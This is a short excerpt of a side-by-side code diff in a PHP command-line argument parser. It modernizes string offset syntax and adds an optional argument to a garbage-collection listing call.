625 | $abbreviations[$k] = $k[0]; | |
618 | 626 | } |
619 | 627 | |
620 | 628 | $abbreviations = [ |
691 | 699 | break; |
692 | 700 | } |
693 | 701 | # This is a parameter or an option |
694 | if(strlen($arg) >= 2 && $arg{0} == '-') | |
702 | if(strlen($arg) >= 2 && $arg[0] == '-') | |
695 | 703 | $this->_parse_cmdline_arg($i, $argv, $parameters, $options); |
696 | 704 | # This is a value |
697 | 705 | else |
705 | 713 | switch($option) |
706 | 714 | { |
707 | 715 | case 'list': |
708 | $this->list_gc(); | |
716 | $this->list_gc(count($arguments) ? $arguments[0]: null); | |
709 | 717 | return; |
710 | 718 | case 'help': |
711 | 719 | $this->help(); |